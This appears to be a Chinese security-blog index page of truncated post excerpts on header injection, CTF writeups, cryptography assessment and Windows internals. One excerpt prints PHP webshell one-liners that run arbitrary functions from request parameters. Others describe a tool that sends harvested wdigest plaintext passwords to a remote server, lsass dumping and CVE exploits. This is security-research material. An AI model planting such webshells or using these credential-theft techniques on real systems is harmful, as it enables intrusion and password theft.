HTTP协议简析之Head部分数据包的第一行的第一个(请求方式):GET / POST我们输入的地方:1.网址的参数的值。...
05月17日44 views评论
渗透测试基础-Head注入
05月17日44 views评论
05月17日44 views评论
G.O.S.S.I.P 阅读推荐 2022-05-16
我们很偏爱的小众学术安全会议——WiSec正在美国召开2022年的会议,今天就为大家介绍一篇来自本年度WiSec会议上的论文 Evil Never Sleeps: When Wireless Malw...
05月17日53 views评论功能
用户
密评科普系列(二):为什么要做密评?及密评实施方案
密评科普系列(一):什么是商用密码?什么是密评?向上滑动阅览目录从入门到精通:密评科普系列一、什么是商用密码1、从理解“密码”开始2、从“密码”到“商用密码”3、密码算法的分类和性质4、商用密码的四大...
05月17日1,802 views评论信息系统
密码
Shell变形
一、Shell变形简单拼接$_GET["k"]($_GET["v"]);<?php@$_POST["k"]($_POST["v"]);?> preg_replace函数preg_repla...
05月17日69 views评论
2014 360hackgame writeup
Ox00扯扯蛋 360网络攻防hackgame开荒记,自己做的一些题,中间有一些是领先的,也算开荒吧,就叫开荒记吧,自己的脑洞也比较大,有的题各种想法就是容易想歪了,思路一跑偏就肯定做不出来了,所以做...
05月17日57 views评论writeup
安全博客
wechall php0816
Ox01 php0816 little hann大牛带我飞 和little hann大牛一起做的 一道题 记录一下 是个php代码审计的 题目的链接 http://www.wechall.net/ch...
05月17日安全博客135 views评论get
php
获取wdigest明文密码加密传输至远程服务器
该工具是去年内部红蓝对抗项目做的一个工具,目的是绕过NIDS\杀毒软件等安全防御策略收集内部所有公用机器登录的用户密码 修改注册表实现记录明文密码 通过Windows原生http方式将密码通过aes加...
05月17日73 views评论data
安全博客
dump lsass进程
64位系统需要编译64位,否则无法获取 12345678910111213141516171819202122232425262728293031323334353637383940414243444...
05月17日安全博客52 views评论lsass
安全博客
CVE-2020-0688 powershell版
专为没有python环境所用,需要ysoserial.exe 支持 123456789101112131415161718192021222324252627282930313233343536373...
05月17日87 views评论cve
powershell
CVE-2020-0601 伪造签名笔记
安装依赖12345pip3 install fastecdsapip3 install PyCryptodomepip3 install --user gmpy2==2.1.0a2apt instal...
05月17日116 views评论cve
microsoft
从零开始学windows API
0x01 前置基础知识宽窄字符刚开始学编程的时候我们就接触了 char、char* 之类的,属于窄字节的,按照刚刚讲的,又多了一个 wchar_t 类型的字符,字符串指针的话就可以是 wchar_t*...
05月17日91 views评论api
windows
查看注册表键值修改时间
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545...
05月17日安全博客328 views评论name
注册表
15680